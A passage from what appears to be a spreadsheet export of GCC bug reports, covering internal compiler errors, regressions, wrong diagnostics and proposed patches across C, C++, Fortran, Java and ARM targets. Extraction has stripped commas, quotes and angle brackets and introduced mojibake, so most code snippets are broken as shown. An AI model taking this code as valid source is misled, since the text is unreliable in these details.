I don't know if __float128 is meant to be supported on x86 (provided the user provides the external library with the relevant functions) or not (it's an optional part of the x86_64 ABI) but it should not ICE in any case it should generate meaningful code or a meaningful error.  (-mmmx is required for the __float128 type to be available on x86.)
extern void abort (void)
extern void exit (int)
int
main (void)
{
  static volatile int i
  static volatile __float128 a
  a = i
  if (0 != a)
    abort ()
  exit (0)
}</t>
  </si>
  <si>
    <t>GCC-72779</t>
  </si>
  <si>
    <t>ice when compiling included lambda pattern (internal compiler error: in is_base_type at dwarf2out.c:9968)</t>
  </si>
  <si>
    <t>Created attachment 39048
Tarball with reproduction information
When compiling the attached repro.cc without the -g flag g++ succeeds:
~/gcc_bug [deepthoughtâ—] Â» g++ -std=c++11 repro.cc                                           
With the -g flag g++ hits an internal compiler error:
~/gcc_bug [deepthoughtâ—] Â» g++ -std=c++11 repro.cc -g
repro.cc: In instantiation of â€˜struct lambda_visitorâ€™:
repro.cc:10:8:   required from â€˜struct lambda_visitorâ€™
repro.cc:49:62:   required from here
repro.cc:22:8: internal compiler error: in is_base_type at dwarf2out.c:9968
 struct lambda_visitor 
        ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cclEDzyl.out file please attach this to your bugreport.
g++ -v:
~/gcc_bug [deepthoughtâ—] Â» g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.4-2ubuntu1~14.04.3' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) 
ice.tgz is attached with
- error.out has the above output
- repro.cc has the source which triggers the ice
- preprocessed_source.cc has the preprocessed source
- the crash file</t>
  </si>
  <si>
    <t>sjust</t>
  </si>
  <si>
    <t>GCC-35546</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] __attribute__(format...) broken for members of template classes?</t>
  </si>
  <si>
    <t>Source code (no includes needed no preprocessor involved at all)
------------------------------------------------------------------------
template 
class T
{
  void operator() (char const * ...) __attribute__((format(printf23)))
}
template class T
------------------------------------------------------------------------
This compiles fine with many different gcc versions up to
including gcc-4.2.2 and does not compile with gcc-4.3.
Error messages and details of compiler below.
Regards
Dirk Zoller
gcc-4.3 -v gcc-4.3-bug.cc
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /pub/unpacked/gcc-4.3.0/configure --prefix=/opt/gnu/gcc-4.3.0 --program-suffix=-4.3 --enable-languages=cc++ --disable-multilib --disable-nls --disable-shared
Thread model: posix
gcc version 4.3.0 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-mtune=generic'
 /opt/gnu/gcc-4.3.0/libexec/gcc/i686-pc-linux-gnu/4.3.0/cc1plus -quiet -v -D_GNU_SOURCE gcc-4.3-bug.cc -quiet -dumpbase gcc-4.3-bug.cc -mtune=generic -auxbase gcc-4.3-bug -version -o /tmp/ccTQ5AXY.s
ignoring nonexistent directory /opt/gnu/gcc-4.3.0/lib/gcc/i686-pc-linux-gnu/4.3.0/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /opt/gnu/gcc-4.3.0/lib/gcc/i686-pc-linux-gnu/4.3.0/../../../../include/c++/4.3.0
 /opt/gnu/gcc-4.3.0/lib/gcc/i686-pc-linux-gnu/4.3.0/../../../../include/c++/4.3.0/i686-pc-linux-gnu
 /opt/gnu/gcc-4.3.0/lib/gcc/i686-pc-linux-gnu/4.3.0/../../../../include/c++/4.3.0/backward
 /usr/local/include
 /opt/gnu/gcc-4.3.0/include
 /opt/gnu/gcc-4.3.0/lib/gcc/i686-pc-linux-gnu/4.3.0/include
 /opt/gnu/gcc-4.3.0/lib/gcc/i686-pc-linux-gnu/4.3.0/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.3.0 (i686-pc-linux-gnu)
	compiled by GNU C version 4.3.0 GMP version 4.2.1 MPFR version 2.3.0.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 730a50d5d37a0cefcf09a41ca8133e43
gcc-4.3-bug.cc: In instantiation of 'T':
gcc-4.3-bug.cc:7:   instantiated from here
gcc-4.3-bug.cc:4: error: 'printf' was not declared in this scope
gcc-4.3-bug.cc:4: error: unrecognized format specifier</t>
  </si>
  <si>
    <t>duz</t>
  </si>
  <si>
    <t>GCC-2465</t>
  </si>
  <si>
    <t>Internal compiler error on 'typeof' of a bound member function</t>
  </si>
  <si>
    <t>GCC crashes on the attempt to instanciate an undefined type.
unknowntype.cpp: In function `int main()':
unknowntype.cpp:9: Internal compiler error.
unknowntype.cpp:9: Please submit a full bug report.
unknowntype.cpp:9: See  for instructions.
Release:
gcc version 2.95.3 20010101 (prerelease)
Environment:
Debian Woody on i386</t>
  </si>
  <si>
    <t>GCC-26277</t>
  </si>
  <si>
    <t>false warning about unused label for a warning used in err=</t>
  </si>
  <si>
    <t>When compiling the following testprogram a false warning is issued about not using the label.
program testlabel
  open(unit=12 file=dummystatus=old&amp;
       action=readerr=99)
  print *file is now open
  stop
99 print *could not open file ...
end program testlabel
I used the following command to compile: 
&gt;gfortran -c Test.F90
 In file Test.F90:8
99 print *could not open file ...
 1
Warning: Label 99 at (1) defined but not used
&gt;
I used the following gfortran version:
&gt;gfortran -v
Using built-in specs.
Target: i386-linux
Configured with: ../gcc/configure --prefix=/tmp/gfortran-20060212/irun --enable-languages=cfortran --host=i386-linux --with-gmp=/tmp/gfortran-20060212/gfortran_libs
Thread model: posix
gcc version 4.2.0 20060212 (experimental)
&gt;
best regards
Jos de Kloe</t>
  </si>
  <si>
    <t>GCC-59016</t>
  </si>
  <si>
    <t>gcc version 4.9.0 20131106 (experimental) [trunk revision 204433] (GCC)  yields the following internal compiler error:
f951: internal compiler error: Segmentation fault
0x9fee4f crash_signal
	../../gcc/gcc/toplev.c:334
0x5ed8f9 gfc_sym_get_dummy_args(gfc_symbol*)
	../../gcc/gcc/fortran/symbol.c:4572
0x5c73e1 resolve_fl_procedure
	../../gcc/gcc/fortran/resolve.c:10971
0x5c73e1 resolve_symbol
	../../gcc/gcc/fortran/resolve.c:13301
0x5e6233 do_traverse_symtree
	../../gcc/gcc/fortran/symbol.c:3571
0x5d1477 resolve_types
	../../gcc/gcc/fortran/resolve.c:14475
0x5c5aa3 gfc_resolve
	../../gcc/gcc/fortran/resolve.c:14572
0x5c5aa3 gfc_resolve(gfc_namespace*)
	../../gcc/gcc/fortran/resolve.c:14560
0x5bb30a gfc_parse_file()
	../../gcc/gcc/fortran/parse.c:4672
0x5f9c65 gfc_be_parse_file
	../../gcc/gcc/fortran/f95-lang.c:189
Please submit a full bug report
when compiling the invalid code below with
gfortran -c  -cpp bug.f90
&gt; cat bug.f90
MODULE atomic_kind_types
  PUBLIC :: atomic_kind_type&amp;
            dft_plus_u_type
CONTAINS
  SUBROUTINE get_atomic_kind_set(atomic_kind_setmaxatommaxcgf&amp;
       zetsoft_maxbasis_set_id)
       CALL stop_program(routineNmoduleN__LINE__&amp;
            The pointer atomic_kind_set is not associated)
  END SUBROUTINE get_atomic_kind_set
  PURE FUNCTION is_hydrogen(atomic_kind) RESULT(res)
    TYPE(atomic_kind_type) POINTER          :: atomic_kind
  END FUNCTION is_hydrogen
END MODULE atomic_kind_types
It appears to be some corruption of some kind since just compiling with gfortran -c bug.f90 does not ICE instead contains some garbage string in the error message:
1
Error: Procedure 'ï¿½ï¿½XS0' in generic interface 'atomic_kind_type' at (1) is neither function nor subroutine
Running under valgrind might help.</t>
  </si>
  <si>
    <t>GCC-59071</t>
  </si>
  <si>
    <t>sse2 intrinsics and constant expressions</t>
  </si>
  <si>
    <t>gcc-4.8.2 with -O0 rejects the following code. With -O1 it works fine. Gcc-4.6 4.7 and clang also work fine. I *believe* the stuff below is a constant expression so it should compile (even without optimizations enabled).
-------
#include emmintrin.h
template __m128i foo(__m128i x) {
	return _mm_slli_si128(x sizeof(__m128i) - N)
}
void bar(__m128i x) { foo(x) }
--------
&gt; g++ test.cc
In file included from test.cc:1:0:
test.cc: In function â€˜__m128i foo(__m128i) [with int N = 4 __m128i = __vector(2) long long int]â€™:
test.cc:4:9: error: the last argument must be an 8-bit immediate
  return _mm_slli_si128(x sizeof(__m128i) - N)</t>
  </si>
  <si>
    <t>GCC-46749</t>
  </si>
  <si>
    <t>gcc.dg/debug/pr41893-1.c -gdwarf-2 testsuite failures on darwin</t>
  </si>
  <si>
    <t>The new gcc.dg/debug/pr41893-1.c testcase fails on darwin as...
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 -g1 (test for excess errors)
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 -g1 -O (test for excess errors)
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 -g1 -O3 (test for excess errors)
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 (test for excess errors)
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 -O (test for excess errors)
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 -O3 (test for excess errors)
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 -g3 (test for excess errors)
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 -g3 -O (test for excess errors)
FAIL: gcc.dg/debug/pr41893-1.c -gdwarf-2 -g3 -O3 (test for excess errors)
where the form of the failure is...
/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/ /sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20101201/gcc/testsuite/gcc.dg/debug/pr41893-1.c -gdwarf-2 -g1 -flto -fwhole-program -O /sw/src/fink.build/gcc46-4.6.0-1000/gcc-4.6-20101201/gcc/testsuite/gcc.dg/debug/pr41893-2.c -lm -m32 -o pr41893-1.exe
warning: (i386) /var/tmp//cchADStB.ltrans0.ltrans.o unable to open object file
warning: no debug symbols in executable (-arch i386)
From the output with -v this appears to be a dsymutil related issue...
 /sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/as -arch i386 -force_cpusubtype_ALL -o /var/tmp//ccyf23lE.ltrans0.ltrans.o /var/tmp//ccJ7sllh.s
COMPILER_PATH=/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/:/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/
LIBRARY_PATH=/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/i386/:/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/i386/:/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/:/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/i386/:/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/:/usr/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-c' '-mmacosx-version-min=10.6.5' '-B' '/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/' '-gdwarf-2' '-g1' '-fwhole-program' '-O' '-m32' '-v' '-mtune=core2' '-dumpdir' './' '-dumpbase' 'pr41893-1.exe.ltrans0' '-fltrans' '-o' '/var/tmp//ccyf23lE.ltrans0.ltrans.o'
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.6.5' '-B' '/sw/src/fink.build/gcc46-4.6.0-1000/darwin_objdir/gcc/' '-gdwarf-2' '-g1' '-flto' '-fwhole-program' '-O' '-m32' '-v' '-o' 'pr41893-1.exe' '-mtune=core2'
 dsymutil pr41893-1.exe
warning: (i386) /var/tmp//ccyf23lE.ltrans0.ltrans.o unable to open object file
warning: no debug symbols in executable (-arch i386)</t>
  </si>
  <si>
    <t>GCC-4064</t>
  </si>
  <si>
    <t>floats and doubles produce wrong output on cout when formatted with setw()</t>
  </si>
  <si>
    <t>cout &lt;&lt; setw(4) &lt;&lt; 1. &lt;&lt; endl
produces 3 '\0' characters (instead of 3 spaces) followed
by a '1'. This bug also occurs in SuSE 7.1 (gcc 2.95.2-149)
and in Caldera OpenLinux 3.1. The output is fine in older
versions: Suse 6.4 (gcc v. 2.95.2-19) and Caldera eDesktop
2.4.
Compilation was simply
g++ setw.test.cc -save-temps
with no errors.
Attached is the preprocessed file.
Release:
gcc version 2.95.3 20010315 (SuSE)
Environment:
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.3/specs</t>
  </si>
  <si>
    <t>paul_hodor</t>
  </si>
  <si>
    <t>GCC-18259</t>
  </si>
  <si>
    <t>-fdump-tree-tu omits real constant values</t>
  </si>
  <si>
    <t>A command of the form:
  g++ -c -fdump-tree-original foo.cc
produces a file foo.cc.original which contains a nearly-complete parse tree. 
The parse tree in question does *not* contain the values of real constants. 
This makes the tree inadequate for any program which tries to analyse the tree.
Here is a patch:
--- /home/gui/gcc-3.4.2-old/gcc/tree-dump.c     2003-12-18 15:09:40.000000000 -0500
+++ /home/gui/gcc-3.4.2/gcc/tree-dump.c 2004-10-31 17:17:23.000000000 -0500
@@ -1766 +17619 @@
   di-&gt;column += 14
 }
+/* Dump real number R using FIELD to identify it.  */
+
+void
+dump_real (dump_info_p di const char *field const REAL_VALUE_TYPE *r)
+{
+  char buf[16]
+  real_to_decimal(buf r sizeof(buf) 0 TRUE)
+  dump_maybe_newline (di)
+  di-&gt;column += 
+    fprintf (di-&gt;stream %-4s: %s  field buf)
+}
+
+
 /* Dump the string S.  */
 void
@@ -5096 +52211 @@
       dump_int (di lngt TREE_STRING_LENGTH (t))
       break
+
+    case REAL_CST:
+      dump_real (di valu TREE_REAL_CST_PTR (t))
+      break                  
+
     case TRUTH_NOT_EXPR:
     case ADDR_EXPR:
     case INDIRECT_REF:
--- /home/gui/gcc-3.4.2-old/gcc/tree-dump.h     2003-06-08 10:21:54.000000000 -0400
+++ /home/gui/gcc-3.4.2/gcc/tree-dump.h 2004-10-31 17:17:34.000000000 -0500
@@ -226 +228 @@
 #ifndef GCC_TREE_DUMP_H
 #define GCC_TREE_DUMP_H
+#include real.h
+
 /* Flags used with queue functions.  */
 #define DUMP_NONE     0
 #define DUMP_BINFO    1
@@ -796 +817 @@
 extern void dump_pointer (dump_info_p const char * void *)
 extern void dump_int (dump_info_p const char * int)
+extern void dump_real (dump_info_p const char * const REAL_VALUE_TYPE *)
 extern void dump_string (dump_info_p const char *)
 extern void dump_stmt (dump_info_p tree)
 extern void dump_next_stmt (dump_info_p tree)</t>
  </si>
  <si>
    <t>dspeyer</t>
  </si>
  <si>
    <t>GCC-6357</t>
  </si>
  <si>
    <t xml:space="preserve"> Here's an unofficial patch which returns us to running destructor base
 cleanups by hand breaking semantics for an exception thrown in the
 destructor body.  I'm not applying this anywhere but you might find it
 useful.
 2002-04-18  Jason Merrill  
 	* init.c (push_base_cleanups): Rename to perform_base_cleanups.
 	Expand base cleanups now rather than pushing them.
 	* decl.c (begin_destructor_body): Don't call push_base_cleanups.
 	(finish_destructor_body): Call perform_base_cleanups.
 	* cp-tree.h: Adjust prototype.
 *** cp-tree.h.~1~	Fri Apr 12 12:43:31 2002
 --- cp-tree.h	Tue Apr  9 01:56:51 2002
 *************** extern tree build_new				PARAMS ((tree 
 *** 39073913 ****
   extern tree build_vec_init			PARAMS ((tree tree int))
   extern tree build_x_delete			PARAMS ((tree int tree))
   extern tree build_delete			PARAMS ((tree tree special_function_kind int int))
 ! extern void push_base_cleanups			PARAMS ((void))
   extern tree build_vbase_delete			PARAMS ((tree tree))
   extern tree build_vec_delete			PARAMS ((tree tree special_function_kind int))
   extern tree create_temporary_var                PARAMS ((tree))
 --- 39073913 ----
   extern tree build_vec_init			PARAMS ((tree tree int))
   extern tree build_x_delete			PARAMS ((tree int tree))
   extern tree build_delete			PARAMS ((tree tree special_function_kind int int))
 ! extern void perform_base_cleanups		PARAMS ((void))
   extern tree build_vbase_delete			PARAMS ((tree tree))
   extern tree build_vec_delete			PARAMS ((tree tree special_function_kind int))
   extern tree create_temporary_var                PARAMS ((tree))
 *** decl.c.~1~	Fri Apr 12 12:43:31 2002
 --- decl.c	Fri Apr 12 11:59:12 2002
 *************** begin_destructor_body ()
 *** 1406414073 ****
     finish_compound_stmt (/*has_no_scope=*/0 compound_stmt)
     finish_then_clause (if_stmt)
     finish_if_stmt ()
 - 
 -   /* And insert cleanups for our bases and members so that they
 -      will be properly destroyed if we throw.  */
 -   push_base_cleanups ()
   }
   /* At the end of every destructor we generate code to delete the object if
 --- 1406414069 ----
 *************** finish_destructor_body ()
 *** 1407814083 ****
 --- 1407414082 ----
   {
     tree exprstmt
 +   /* And perform cleanups for our bases and members.  */
 +   perform_base_cleanups ()
 + 
     /* In a virtual destructor we must call delete.  */
     if (DECL_VIRTUAL_P (current_function_decl))
       {
 *** init.c.~1~	Fri Apr 12 12:43:31 2002
 --- init.c	Fri Apr  5 23:38:24 2002
 *************** build_delete (type addr auto_delete f
 *** 32183230 ****
       }
   }
 ! /* At the beginning of a destructor push cleanups that will call the
 !    destructors for our base classes and members.
 !    Called from setup_vtbl_ptr.  */
   void
 ! push_base_cleanups ()
   {
     tree binfos
     int i n_baseclasses
 --- 32183230 ----
       }
   }
 ! /* At the end of a destructor call the destructors for our base classes
 !    and members.
 !    Called from finish_destructor_body.  */
   void
 ! perform_base_cleanups ()
   {
     tree binfos
     int i n_baseclasses
 *************** push_base_cleanups ()
 *** 32683274 ****
   					LOOKUP_NORMAL)
   	      expr = build (COND_EXPR void_type_node cond
   			    expr void_zero_node)
 ! 	      finish_decl_cleanup (NULL_TREE expr)
   	    }
   	}
       }
 --- 32683274 ----
   					LOOKUP_NORMAL)
   	      expr = build (COND_EXPR void_type_node cond
   			    expr void_zero_node)
 ! 	      finish_expr_stmt (expr)
   	    }
   	}
       }
 *************** push_base_cleanups ()
 *** 32883294 ****
   				       base_dtor_identifier
   				       NULL_TREE)
 !       finish_decl_cleanup (NULL_TREE expr)
       }
     for (member = TYPE_FIELDS (current_class_type) member
 --- 32883294 ----
   				       base_dtor_identifier
   				       NULL_TREE)
 !       finish_expr_stmt (expr)
       }
     for (member = TYPE_FIELDS (current_class_type) member
 *************** push_base_cleanups ()
 *** 33063312 ****
   			       sfk_complete_destructor
   			       LOOKUP_NONVIRTUAL|LOOKUP_DESTRUCTOR|LOOKUP_NORMAL
   			       0)
 ! 	  finish_decl_cleanup (NULL_TREE expr)
   	}
       }
   }
 --- 33063312 ----
   			       sfk_complete_destructor
   			       LOOKUP_NONVIRTUAL|LOOKUP_DESTRUCTOR|LOOKUP_NORMAL
   			       0)
 ! 	  finish_expr_stmt (expr)
   	}
       }
   }
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-4811</t>
  </si>
  <si>
    <t>Incorrect error accessing non-existant outer field</t>
  </si>
  <si>
    <t>The following test case reports the wrong error message:
public class Local2
{
  class I
  {
    void j()
    {
      int i = q
    }
  }
}
$ gcj -c Local2.java 
Local2.java: In class `Local2$I':
Local2.java: In method `Local2$I.j()':
Local2.java:7: Local variable `q' can't be accessed from within the inner class `Local2$I' unless it is declared final.
Release:
trunk</t>
  </si>
  <si>
    <t>GCC-51159</t>
  </si>
  <si>
    <t>build failure with --enable-build-with-cxx in gcc-4.6.2/gcc/objc/objc-next-runtime-abi-02.c</t>
  </si>
  <si>
    <t>Created attachment 25837
Proposed patch.
I am trying to build gcc-4.6.2 with the following flags:
./../gcc-4.6.2/configure --disable-nls --with-ppl=$GCC_BASE --with-cloog=$GCC_BASE --prefix=$GCC_BASE --with--mpfr=$GCC_BASE --with-gmp=$GCC_BASE --with-mpc=$GCC_BASE --with-libelf=$GCC_BASE --enable-lto --enable-gold --enable-bootstrap --enable-build-with-cxx
Everything necessary is prepared in $GCC_BASE.
Eventually this happens:
.././../gcc-4.6.2/gcc/objc/objc-next-runtime-abi-02.c: In function â€˜const char* newabi_append_ro(const char*)â€™:
.././../gcc-4.6.2/gcc/objc/objc-next-runtime-abi-02.c:1884:29: error: invalid conversion from â€˜const char*â€™ to â€˜char*â€™
make[2]: *** [objc/objc-next-runtime-abi-02.o] Error 1
C++ provides the following signatures for strchr:
const char * strchr ( const char * str int character )
      char * strchr (       char * str int character )
Neither of these matches making the assignment in dollar = strchr (name '$') fail. Please find the proposed patch attached (which might break compilation with C I don't know C as good as C++).</t>
  </si>
  <si>
    <t>sebastian.hegler</t>
  </si>
  <si>
    <t>GCC-2004</t>
  </si>
  <si>
    <t>[ARM] Internal error on correct code while compiling for ARM</t>
  </si>
  <si>
    <t>Using gcc pulled from the 3.0 branch of the CVS tree (:pserver:anoncvs@gcc.gnu.org:/cvs/gcc).
Updated on 02/16/2001 around 3 AM EST.
Built to cross-compile ARM code from an i686/linux PC using the following commands:
export CFLAGS=-O2 -fomit-frame-pointer
../gcc/configure --target=arm-linux-elf --enable-languages=c --prefix=/usr/local/nexwave/arm-tools
make
make install
Produces an internal error when trying to compile the attached code (treebug.i gzipped).
Full command line:
arm-linux-elf-gcc -v -save-temps -O2 -c -o treebug.o treebug.c
Compiler output:
Reading specs from /usr/local/nexwave/arm-tools/lib/gcc-lib/arm-linux-elf/2.97/specs
Configured with: ../gcc/configure --target=arm-linux-elf --enable-languages=c --prefix=/usr/local/nexwave/arm-tools
gcc version 2.97 20010215 (experimental)
 /usr/local/nexwave/arm-tools/lib/gcc-lib/arm-linux-elf/2.97/cpp0 -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -Acpu=arm -Amachine=arm -D__CHAR_UNSIGNED__ -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D__ARM_ARCH_4T__ -D__APCS_32__ -D__ARMEL__ -D__ELF__ -D__arm__ treebug.c treebug.i
GNU CPP version 2.97 20010215 (experimental) (cpplib) (ARM/ELF non-Linux)
ignoring nonexistent directory /usr/local/nexwave/arm-tools/arm-linux-elf/sys-include
#include ... search starts here:
#include  search starts here:
 /usr/local/nexwave/arm-tools/lib/gcc-lib/arm-linux-elf/2.97/include
 /usr/local/nexwave/arm-tools/arm-linux-elf/include
End of search list.
 /usr/local/nexwave/arm-tools/lib/gcc-lib/arm-linux-elf/2.97/cc1 -fpreprocessed
treebug.i -quiet -dumpbase treebug.c -O2 -version -o treebug.s
GNU CPP version 2.97 20010215 (experimental) (cpplib) (ARM/ELF non-Linux)
GNU C version 2.97 20010215 (experimental) (arm-linux-elf)
        compiled by GNU C version 2.95.3 20010125 (prerelease).
treebug.c: In function `RedBlackTreeApply_Prototypized':
treebug.c:34: Internal error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 2.97 20010215 (experimental)
Environment:
Linux 2.4.1/i686 on pentium III.</t>
  </si>
  <si>
    <t>emarty</t>
  </si>
  <si>
    <t>GCC-19182</t>
  </si>
  <si>
    <t>Error messages seem to be printed slower</t>
  </si>
  <si>
    <t>When I compare the speed of the screen output of say gcc and gfortran then 
it seems to me as if gfortran produced its output much more slowly.  gcc's 
output seems to appear line by line whereas gfortran's output seems to appear 
character by character.  This could be caused by gfortran flushing after every 
character instead of after every line or something similar.  I'm wondering 
does gfortran do something special when it outputs diagnostic messages?  There 
has to be some difference -- gfortran's messages do look different as 
gfortran tries to print a cute pointer indicating the offending column 
which gcc does not.</t>
  </si>
  <si>
    <t>GCC-61009</t>
  </si>
  <si>
    <t>[4.9 Regression] Incorrect jump threading in dom</t>
  </si>
  <si>
    <t>Created attachment 32709
t.C
We ran into a runtime failure that was tracked down to the jump threading performed during the dom1 pass. I reproduced it with trunk (updated to r209902).
I've attached a reduced test case. Build with:
g++ -fno-tree-vrp -O2 -std=c++11 -fno-strict-aliasing t.C -S
Unfortunately it isn't runnable but the problem is apparent in the resulting dumps/assembly.
The code initially looks like:
   for (int j = 0 j &lt; NKF  ++j) {
     int field_idx = idxs[j]
     int cmp = doCmp(row_offset field_idx)
     fprintf (stderr cmp=%d\ncmp)
     if (cmp == 0) {
       continue
     }
     if (cmp &gt; 0) {
       is_different = true
       break
     } else {
       fprintf (stderr Incorrect\n)
       return false
     }
   }
But after dom1 jump threading it looks something like:
   for (int j = 0 j &lt; NKF  ++j) {
     int field_idx = idxs[j]
     int cmp = doCmp(row_offset field_idx)
     fprintf (stderr cmp=%d\ncmp)
     if (cmp == 0) {
       goto L1
     }
     if (cmp &gt; 0) {
       is_different = true
       break
     } else {
ERROR:
       fprintf (stderr Incorrect\n)
       return false
     }
L1:
     ++j
     if (j &gt;= NKF)
        break
     field_idx = idxs[j]
     cmp = doCmp(row_offset field_idx)
     fprintf (stderr cmp=%d\ncmp)
     if (cmp == 0) {
       goto L1
     }
     goto ERROR
   }
Notice that after threading the duplicated code wrongly simplifies away the check of cmp &gt; 0.
I've also attached the dom1 dump. The problematic jump thread is this one:
  Registering jump thread: (14 12) incoming edge  (12 4) joiner  (4 5) nocopy
Since some of these blocks (12 and 14) were created by the earlier dom optimizations I modified tree-ssa-threadupdate.c to dump the cfg when entering thread_through_all_blocks. The attached dump includes that extra dump.</t>
  </si>
  <si>
    <t>tejohnson</t>
  </si>
  <si>
    <t>GCC-23055</t>
  </si>
  <si>
    <t>overload resolution does not find templated function (zero -&gt; pointer)</t>
  </si>
  <si>
    <t>I believe that the call to foo in line 35 should resolve to the function defined
in line 28/29.
# 1 gnubug.cc
# 1 
# 1 
# 1 gnubug.cc
# 1 /local/lib/gcc/i686-pc-linux-gnu/4.0.0/include/stddef.h 1 3 4
# 152 /local/lib/gcc/i686-pc-linux-gnu/4.0.0/include/stddef.h 3 4
typedef int ptrdiff_t
# 214 /local/lib/gcc/i686-pc-linux-gnu/4.0.0/include/stddef.h 3 4
typedef unsigned int size_t
# 2 gnubug.cc 2
class A {}
template  struct default_return_type
{ typedef void type
}
template 
struct default_return_type
{ typedef int type
}
template  class RetType&gt;
struct Base
{
  typedef typename RetType::type surrogate_t
  template 
  void foo(T&amp; typename RetType::type * ret) {}  // line 29
  void foo1(A&amp; surrogate_t * ret) {}
}
struct Concrete : Base
{ void bar(A }  // line 35
  void bar0(A foo(a x) }
  void bar1(A }
}</t>
  </si>
  <si>
    <t>peter.pirkelbauer</t>
  </si>
  <si>
    <t>GCC-58705</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] [c++11] ICE with invalid initializer for _Complex variable</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11) triggers an ICE since GCC 4.7.0:
===============================
_Complex float f = {{}}
===============================
bug.cc:1:23: internal compiler error: Segmentation fault
 _Complex float f = {{}}
                       ^
0xb15dff crash_signal
        ../../gcc/gcc/toplev.c:335
0x5e6d15 vec::operator[](unsigned int)
        ../../gcc/gcc/vec.h:827
0x5e6d15 check_narrowing(tree_node* tree_node*)
        ../../gcc/gcc/cp/typeck2.c:836
0x55e437 check_initializer
        ../../gcc/gcc/cp/decl.c:5669
0x570ccc cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc/gcc/cp/decl.c:6356
0x65e7e7 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16633
0x65ff2f cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11047
0x643860 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10928
0x66aaae cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10825
0x6697ca cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10711
0x66b0e6 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3989
0x66b0e6 c_parse_file()
        ../../gcc/gcc/cp/parser.c:30962
0x787f73 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-20789</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with incomplete type in template</t>
  </si>
  <si>
    <t>GCC-45037</t>
  </si>
  <si>
    <t>lto1 ICEs when linking cns_solve</t>
  </si>
  <si>
    <t>Current gcc trunk (but not gcc 4.5.1) ICEs when linking cns_solve using -O2 -fwhopr -fwholeprogram. The reduced test case is attached and crashes as...
[MacPro:~/badlinkdir] howarth% gfortran -c -fdefault-integer-8 -w -O2 -fwhopr -fwhole-program --save-temps array_reduced.f
[MacPro:~/badlinkdir] howarth% gfortran -c -fdefault-integer-8 -w -O2 -fwhopr -fwhole-program --save-temps cns_reduced.f
[MacPro:~/badlinkdir] howarth% gfortran -c -fdefault-integer-8 -w -O2 -fwhopr -fwhole-program --save-temps genic_reduced.f
